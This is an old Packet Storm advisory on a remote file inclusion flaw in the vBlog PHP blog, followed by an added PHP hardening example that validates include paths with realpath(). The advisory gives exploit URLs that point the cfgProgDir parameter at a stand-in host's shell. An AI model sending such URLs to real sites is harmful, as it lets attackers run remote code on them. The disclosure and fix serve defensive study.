vblog1201-rfi.txt

2006-11-09T00:00:00
ID PACKETSTORM:51814
Type packetstorm
Reporter Dr.Pantagon
Modified 2006-11-09T00:00:00

Description

                                        
`**********************************************************************************************************  
WwW.Deltahacking.NeT (Priv8 Site)  
WwW.Deltahacking.Ir (Public Site)  
**********************************************************************************************************  
  
* Portal Name : Vortex Blog AKA vBlog  
  
* Class = Remote File Inclusion  
  
* Download = http://switch.dl.sourceforge.net/sourceforge/c12/C12_a0.1_nonfunc.zip  
  
* Found by = Dr.Pantagon (rezayavari2006@yahoo.com)  
  
--------------------------------------------------------------------------------------------  
- Vulnerable Code  
  
include($cfgProgDir . "session.php");  
  
++++++++++++++++++++++++++++++++++++++++++++  
  
- Exploit:  
  
  
http://[target]/[path]/admin/auth/secure.php?cfgProgDir=http://evilsite.com/shell?  
http://[target]/[path]/admin/auth/checklogin.php?cfgProgDir=http://evilsite.com/shell?  
  
  
--------------------------------------------------------------------------------------------  
  
Special Thanks : Dr.Trojan , Hiv++ , D_7j , Lord  
Special Thanks To My Best Friend : Tanha  
  
**********************************************************************************************************  
`
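
Added example, not part of the original advisory and not vBlog's own code: the exploit URLs above pass `cfgProgDir` as a query parameter, so the `include` has to stop taking its directory from the request. This PHP example resolves the include target with `realpath()` under a directory chosen server-side; the helper name `safe_include_path`, the host `attacker.example` and the temporary demo directory are assumptions made for illustration.

```php
<?php
// Added example, not vBlog's code. The advisory's pattern, kept as a comment:
//   include($cfgProgDir . "session.php");   // $cfgProgDir arrives from the URL

/**
 * Resolve $file under $baseDir. Returns the canonical local path, or null
 * when it does not resolve on the local filesystem (remote URLs, stream
 * wrappers, missing files) or resolves outside $baseDir.
 * Hypothetical helper name, introduced for this example.
 */
function safe_include_path(string $baseDir, string $file): ?string
{
    $base   = realpath($baseDir);
    $target = realpath($baseDir . DIRECTORY_SEPARATOR . $file);
    if ($base === false || $target === false) {
        return null;
    }
    // Compare against "base/" so a sibling such as "base.txt" cannot pass as "base".
    $prefix = rtrim($base, DIRECTORY_SEPARATOR) . DIRECTORY_SEPARATOR;
    return strncmp($target, $prefix, strlen($prefix)) === 0 ? $target : null;
}

// Call site in a hardened script: the directory comes from the file's own
// location, never from $_GET, $_POST or $_COOKIE:
//   $path = safe_include_path(__DIR__, 'session.php');
//   if ($path === null) { http_response_code(500); exit; }
//   include $path;

// Constructed demo: a temporary directory stands in for admin/auth/.
$demoDir = sys_get_temp_dir() . DIRECTORY_SEPARATOR . 'rfi_demo_' . getmypid();
if (!is_dir($demoDir)) {
    mkdir($demoDir);
}
file_put_contents($demoDir . DIRECTORY_SEPARATOR . 'session.php', "<?php\n");
file_put_contents($demoDir . '.txt', "outside the base directory\n");

$cases = [
    ['server-side directory',          $demoDir, 'session.php'],
    ['URL-shaped value (constructed)', 'http://attacker.example/shell?', 'session.php'],
    ['sibling file via ..',            $demoDir, '..' . DIRECTORY_SEPARATOR . basename($demoDir) . '.txt'],
];
foreach ($cases as [$label, $dir, $file]) {
    $result = safe_include_path($dir, $file);
    echo $label, ': ', $result === null ? 'rejected' : 'accepted', PHP_EOL;
}
```

Independently of the code fix, `allow_url_include = Off` in php.ini stops `include` from fetching `http://` and `ftp://` URLs.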